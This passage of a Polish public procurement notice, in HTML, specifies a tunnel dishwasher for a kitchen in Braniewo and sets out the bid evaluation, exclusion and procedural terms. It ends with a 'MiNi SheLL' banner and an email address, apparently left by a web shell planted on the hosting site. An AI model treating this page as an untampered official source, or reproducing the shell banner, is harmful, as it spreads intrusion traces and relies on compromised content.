wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przyjęty do realizacji wariant okresu dostaw</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakup i dostawa - ZMYWARKA TUNELOWA Z TRANSPORTEM KOSZOWYM DO MYCIA ZASTAWY STOŁOWEJ I TAC KONSUMENCKICH minimalna ilość zamówienia 1 szt; maksymalna ilość zamówienia 2 szt. Miejsce dostawy Kuchnia i stołówka 14-500 Braniewo ul. Sikorskiego 41<br/>Przeznaczenie: <br/>Do mycia wstępnego, mycia zasadniczego i suszenia zastawy stołowej oraz tac w systemie ciągłym.<br/>Wymagania konstrukcyjne:<br/>1.	Spełnienie wymagań dotyczących:<br/>a)	klasyfikacji zgodnie z normą PN-90/A-55655 Zmywarki i urządzenia pomocnicze w zakładach żywienia zbiorowego,<br/>b)	wykonania zgodnie z normą PN-91/A-55636 Zmywarki do naczyń elektryczne dla zakładów żywienia zbiorowego,<br/>c)	bezpieczeństwa użytkowania uzupełniającego zgodnie z normą PN-91/E-2562-03 zmywarki do naczyń elektryczne dla zakładów żywienia zbiorowego.<br/>2.	Urządzenie przystosowane do eksploatacji w warunkach wielogodzinnej pracy ciągłej, proces technologiczny ciągły (dotyczy wszystkich cykli pracy urządzenia związanych z myciem wstępnym, myciem zasadniczym, płukaniem i suszeniem).<br/>3.	Wykonane ze stali nierdzewnej kwasoodpornej min. AISI 304, OH18N9.<br/>1.	Komora robocza typu przelotowego oraz przystosowana do mycia zastawy stołowej i tac konsumenckich. <br/>2.	System koszowy dla naczyń porcelanowych mytych w koszach 500 x 500 mm<br/>3.	Konstrukcja spełniająca wymogi mycia zasadniczego w temperaturze 55 – 60 ˚C i płukania z wyparzaniem w temperaturze 80 – 85 ˚C.<br/>4.	Przystosowana do zasilania wodą o ciśnieniu minimalnym 2,0 – 2,5 bar (29 psi), ciśnieniu maksymalnym 9,0-10 bar(145 psi) zimną o temperaturze od 12 ˚C i ciepłą o temperaturze od 50 do 60 ˚C.<br/>5.	Część załadowcza tunelu minimum 440 mm wysokości.<br/>6.	Długość komory mycia wstępnego tunelu minimum 500 mm, wyposażona w ramiona myjących na dole komory i na górze komory mycia wstępnego, wykonane ze stali nierdzewnej OH18N9.<br/>7.	Komora mycia zasadniczego i płukania tunelu o długości minimum 1350-1450 mm wyposażona w minimum po 3 ramiona myjących na dole komory i 4 ramiona myjące na górze komory mycia wykonane ze stali nierdzewnej OH18N9.<br/>8.	Komora suszenia umytych naczyń o długości 650-800 mm, o mocy grzałki suszenia minimum 3-6 kW (+/- 5%), z nadmuchem. Komora suszenia musi być oryginalna tzn. wyprodukowana przez tego samego producenta co zmywarka tunelowa.<br/>9.	Osłony wejścia do tunelu o zwiększonej izolacyjności,( tzn. fabryczne zabezpieczenia przeciw rozbryzgowi wody i nadmierną emisją pary na zewnątrz – kurtyny paskowe).<br/>10. Panel sterowania, włącznik główny, wskaźniki temperatur oraz przełącznik prędkości transportu koszy zabezpieczony przed zalaniem -standard IPX-4 (PN-EN 60335- 2-58).<br/>11.	Kable zasilające i przyłączeniowe oraz przewody doprowadzające wodę o długości pozwalającej na bezpieczną eksploatację, ustalane indywidualnie w miejscu montażu.<br/>Wymagania techniczne:<br/>1.	Napięcie zasilania - 400 V.<br/>2.	Moc maksymalna urządzenia do 39 kW.<br/>3.	Wydajność teoretyczna minimum 100 koszy (1800 talerzy) na godzinę.<br/>4.	Minimum dwie prędkości transportu taśmy,<br/>5.	Zużycie wody do maksymalnie do 230 l. na godzinę.<br/>6.	Wymiary tunelowej maszyny do mycia naczyń: <br/>a)	długość maksymalnie do 2000 mm,<br/>b)	szerokość maksymalnie do 775 mm,<br/>c)	wysokość maksymalnie do 1474 mm,<br/>d)	wysokość komory tunelu myjącego minimalnie 440 mm.<br/>Wymagania dotyczące eksploatacji:<br/>1.	Mgielna charakterystyka pracy dysz.<br/>2.	Osłony wejścia do tunelu (tzn. fabryczne zabezpieczenia przeciw rozbryzgowi wody <br/>i nadmiernej emisji pary).<br/>3.	Sterowanie procesem mycia (panel sterujący ze wskaźnikami temperatury mycia <br/>i płukania, prędkości posuwu koszy, wyłącznik). Elektroniczne sterowanie procesem mycia (elektroniczny panel sterujący ze wskaźnikami temperatury mycia i płukania, informują o usterkach technicznych oraz braku detergentu myjącego).<br/>Panel posiada funkcje:<br/>a.	liczenia ilości umytych koszy,<br/>b.	odczytywania temperatur wody myjącej i płuczącej z alarmem dźwiękowym<br/> o ich zbyt niskiej lub zbyt wysokiej temperaturze,<br/>c.	alarmowania o konieczności wymiany wody zbiornikowej w przypadku jej zabrudzenia przekraczającej dopuszczalne normy,<br/>d.	regulacji wielkości dozowania środka chemicznego w zależności <br/>od zabrudzenia wody poprzez czujnik zabrudzenia wody.<br/>4.	System mycia uruchamiany automatycznie przy wejściu naczyń.<br/>5.	Filtry powierzchniowe w komorze mycia.<br/>6.	Wyjmowany osadnik zanieczyszczeń.<br/>7.	Bezspoinowy zbiornik komory mycia z zaokrąglonymi narożnikami.<br/>8.	Zaokrąglone krawędzie komory zapewniające pełną higienę i uniemożliwiające osadzanie się brudu.<br/>9.	Łatwy dostęp elementów wymagających czyszczenia.<br/>10.	Elementy systemu mycia wymagające codziennego czyszczenia kodowane optycznie w celu łatwego rozpoznania przez obsługę.<br/>11.	Funkcja oszczędzania wody i energii (pompa płukania z wyparzaniem włączają się, gdy myty element trafia do strefy płukania).<br/>12.	Elektrozawór na doprowadzeniu wody do bojlera.<br/>13.	Wyposażenie w system filtracji wody zbiornikowej.<br/>14.	Pojemność zbiornika myjącego nie przekraczająca 100 litrów wody.<br/>15.	Kierunek pracy z prawej na lewo. (z lewej na prawo) w zależności od usytuowania maszyny w zmywalni.<br/>16.	Zabezpieczenie przed pracą na sucho.<br/>17.	Zabezpieczenie przed przegrzaniem.<br/>18.	Zabezpieczenie przed uszkodzeniem w wyniku<br/>a)	zaniku dopływu wody,<br/>b)	zaniku fazy,<br/>c)	przeciążenia napędu,<br/>d)	otwarcia komór roboczych w trakcie pracy,<br/>e)	przegrzanie bojlera.<br/>19.	Automatyczny system usuwania drobnych zabrudzeń w komorze mycia podczas pracy maszyny – filtracja zabrudzeń.<br/>20.	Zewnętrzna automatyczna stacja uzdatniania wody zmiękczająca wodę z sieci do maksimum 3˚ dH ( 3,75 clark – 0,5 mmol, 80-120 µS/cm) dopasowana do parametrów maszyny.<br/>Wyposażenie dodatkowe w załączniku nr 1 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">42959000-3 - Zmywarki do naczyń inne niż używane w gospodarstwie domowym</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamówienie realizowane będzie z wykorzystaniem prawa opcji. Opcja polega na powtórzeniu tego samego asortymentu dla ilości maksymalnych określonych w SWZ. Jeżeli dla pozycji asortymentowej ilość minimalna i maksymalna stanowią taką samą wielkość oznacza to, że dla danej pozycji asortymentowej Zamawiający nie stosuje prawa opcji. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami (oddzielnie dla części zamówienia nr 1, 2, 3):<br/>1) Cena brutto oferty dla ilości minimalnych- 60%<br/>2) Przyjęty do realizacji wariant okresu gwarancji - 40%<br/>2. Liczba punktów uzyskanych przez daną ofertę będzie wyliczona według wzoru:<br/>P = K1 + K2 <br/>K1 – liczba punktów uzyskana przez daną ofertę w kryterium „Cena brutto oferty dla ilości minimalnych”<br/>K2 – liczba punktów uzyskana przez daną ofertę w kryterium „Przyjęty do realizacji wariant okresu gwarancji”<br/><br/>3.	W kryterium „Cena brutto oferty dla ilości minimalnych” zostanie zastosowany wzór:<br/> najniższa oferowana cena brutto dla ilości minimalnych <br/>Liczba punktów = --------------------------------------------------------- x 100 pkt x 60%<br/> cena brutto dla ilości minimalnych oferty badanej<br/><br/><br/>W kryterium „Przyjęty do realizacji wariant okresu gwarancji” oferta uzyska:<br/>•	0 pkt za WARIANT I – zaoferowanie 12 miesięcznej gwarancji na przedmiot zamówienia <br/>•	20 pkt za WARIANT II – zaoferowanie 24 miesięcznej gwarancji na przedmiot zamówienia<br/>•	30 pkt za WARIANT III – zaoferowanie 36 miesięcznej gwarancji na przedmiot zamówienia<br/>•	40 pkt za WARIANT IV – zaoferowanie 48 miesięcznej gwarancji na przedmiot zamówienia<br/><br/>Wykonawca spośród przedstawionych wariantów wybiera jeden wariant udzielanej gwarancji i stosowną informację zaznacza w tabeli (odpowiednio do części zamówienia) w pkt 5 formularza ofertowego (załącznik nr 2 do SWZ).<br/>UWAGA:<br/>a)	Gwarancji na przedmiot umowy, liczony będzie: <br/>- od dnia dostawy do Zamawiającego – dla części zamówienia nr 1 <br/>- od dnia rozruchu technicznego i technologicznego u Zamawiającego – dla części zamówienia nr 2, 3.<br/>b) Minimalny wymagany termin gwarancji wynosi 12 miesięcy, natomiast maksymalny, punktowany termin gwarancji wynosi 48 miesięcy.<br/>c) W przypadku niewpisania przez Wykonawcę w formularzu ofertowym żadnego terminu gwarancji, Zamawiający uzna, że Wykonawca zaoferował termin 12-miesięczny i otrzyma 0 pkt.<br/>d) W przypadku wpisania terminu gwarancji krótszego niż 12 miesięcy, oferta Wykonawcy zostanie odrzucona, jako niezgodna z SWZ.<br/>e) W przypadku wpisania terminu gwarancji dłuższego niż 48 miesięcy, Zamawiający przyzna punkty jak dla terminu 48-miesięcznego, natomiast do umowy wpisze, jako obowiązujący termin gwarancji faktycznie zaoferowany przez Wykonawcę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przyjęty do realizacji wariant okresu dostaw</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/>1) odpisu lub informacji z Krajowego Rejestru Sądowego lub Centralnej ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestracji lub ewidencji; lub Zamawiający nie wezwie, jeśli uzyska je za pomocą bezpłatnych i ogólnodostępnych baz danych w szczególności rejestrów publicznych;<br/>2) jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w ust. 1 pkt 1), dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że: nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. Dokument, o którym mowa powyżej, powinien być wystawiony nie wcześniej niż 3 miesiące przed jego złożeniem.<br/>3) jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 1 pkt 2), zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy. Dokument powinien być wystawiony odpowiednio jak w terminie wskazanym w ust. 1 pkt 2).<br/>4) do podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy Pzp (jeżeli dotyczy) oraz podwykonawców niebędących podmiotami udostępniającymi zasoby na tych zasadach, mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, przepisy ust. 1 pkt 2) i 3) stosuje się odpowiednio.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1. W przypadku, jeżeli Wykonawca przewiduje zastosowanie rozwiązań równoważnych, Zamawiający wymaga złożenia wraz z ofertą środków dowodowych, jakimi Wykonawca udowodni, że oferowane rozwiązanie jest równoważne rozwiązaniom opisanym w SWZ. Zamawiający nie ogranicza rodzaju tych środków dowodowych. W szczególności mogą to być wybrane przez Wykonawcę przedmiotowe środki dowodowe, o których mowa <br/>w art. 104, 105 i 106 ustawy Pzp, w tym określonych w Rozdziale IV ust. 5 niniejszej SWZ.<br/>2. Jeżeli Wykonawca nie złoży przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe będą niekompletne, Zamawiający wezwie do ich złożenia lub uzupełnienia w wyznaczonym terminie. Zamawiający może żądać od wykonawców wyjaśnień dotyczących treści przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1. W przypadku, jeżeli Wykonawca przewiduje zastosowanie rozwiązań równoważnych, Zamawiający wymaga złożenia wraz z ofertą środków dowodowych, jakimi Wykonawca udowodni, że oferowane rozwiązanie jest równoważne rozwiązaniom opisanym w SWZ. Zamawiający nie ogranicza rodzaju tych środków dowodowych. W szczególności mogą to być wybrane przez Wykonawcę przedmiotowe środki dowodowe, o których mowa <br/>w art. 104, 105 i 106 ustawy Pzp, w tym określonych w Rozdziale IV ust. 5 niniejszej SWZ.<br/>2. Jeżeli Wykonawca nie złoży przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe będą niekompletne, Zamawiający wezwie do ich złożenia lub uzupełnienia w wyznaczonym terminie. Zamawiający może żądać od wykonawców wyjaśnień dotyczących treści przedmiotowych środków dowodowych. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga wniesienia wadium w części zamówienia nr 1, nr 2, nr 3.<br/>Przystępując do postępowania Wykonawca zobowiązany jest do wniesienia wadium w wysokości:<br/>a) dla części zamówienia nr 1 – 1 000,00 PLN;<br/>b) dla części zamówienia nr 2 – 1 800,00 PLN;<br/>c) dla części zamówienia nr 3 – 1 400,00 PLN.<br/>Wadium musi być wniesione przed upływem terminu składania ofert i utrzymane nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku Wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia - Oświadczenie Wykonawcy, o którym mowa w art. 125 ust. 1 ustawy Pzp, potwierdzającego brak podstaw wykluczenia na podstawie art. 108 ust 1 oraz art. 109 ust. 1 pkt 4), 5) i 7) ustawy Pzp oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego zgodnie ze wzorem – załącznik nr 3 SWZ (Rozdział II oświadczenia) składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Dokumenty te potwierdzają brak podstaw wykluczenia.<br/>2. W przypadku Wykonawców wspólnie ubiegać się o udzielenie zamówienia. W takiej sytuacji zobowiązani są ustanowić pełnomocnika do reprezentowania ich w postepowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo musi być dołączone do oferty (oryginał lub kopia potwierdzana za zgodność z oryginałem przez mocodawcę).<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego, których oferta zostanie uznana za najkorzystniejszą, przedłoży umowę regulującą współpracę tych Wykonawców, w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę lub osoby uprawnione do reprezentowania Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje zmiany umowy w przypadku: <br/>1)	zmiany przepisów prawnych, mających wpływ na wykonanie przedmiotu zamówienia;<br/>2)	zmiany wysokości wynagrodzenia w sytuacji, gdy nastąpi urzędowa zmiana stawki podatku VAT;<br/>3)	wystąpi konieczność zmiany umowy na podstawie art. 455 ustawy Pzp. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-02-09 08:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://portal.smartpzp.pl/21wog</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-02-09 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-03-10</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.Wymagany termin wykonania zamówienia: dla części zamówienia nr 1, 2, 3 – 6 miesięcy od daty zawarcia umowy.<br/>2. Zamawiający informuje, że z postępowania o udzielenie zamówienia wykluczy Wykonawcę na podstawie przesłanek opisanych w przepisie art. 7 ust 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.

Creat By MiNi SheLL
Email: jattceo@gmail.com